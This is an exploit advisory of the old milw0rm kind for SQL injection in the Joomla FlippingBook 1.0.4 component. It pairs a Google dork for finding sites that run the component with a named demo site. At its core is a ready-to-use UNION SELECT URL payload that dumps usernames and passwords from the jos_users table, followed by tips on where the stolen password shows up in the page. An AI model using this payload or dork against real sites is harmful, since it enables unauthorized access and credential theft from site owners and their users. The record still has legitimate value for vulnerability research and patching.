30 lines
No EOL
1.2 KiB
Text
30 lines
No EOL
1.2 KiB
Text
[ A L G E R I A S E C U R I T Y C R E W ]
|
|
##########################################
|
|
#
|
|
# [ Joomla Component FlippingBook 1.0.4 SQL Injection ]
|
|
#
|
|
##########################################
|
|
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
|
|
[~] Contact: c02[at]hotmail.de
|
|
[~] Website: http://www.Dz-Secure.com
|
|
[~] Greetings: to all hackers DZ . . .
|
|
##########################################
|
|
[~] ScriptName : 'Joomla'
|
|
[~] ModuleName : 'FlippingBook'
|
|
[~] Version() : 1.0.4
|
|
###########################################
|
|
#
|
|
# DORK 1 : inurl:com_flippingbook
|
|
#
|
|
###########################################
|
|
[+]Demo : http://www.page-flip-tools.com/index.php?option=com_flippingbook
|
|
|
|
[+]Exploit :
|
|
|
|
/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
|
|
###########################################
|
|
[+] : you can see the password in 'Title'
|
|
[+] : Open the source page to see the 'password'
|
|
###########################################
|
|
|
|
# milw0rm.com [2008-04-22] |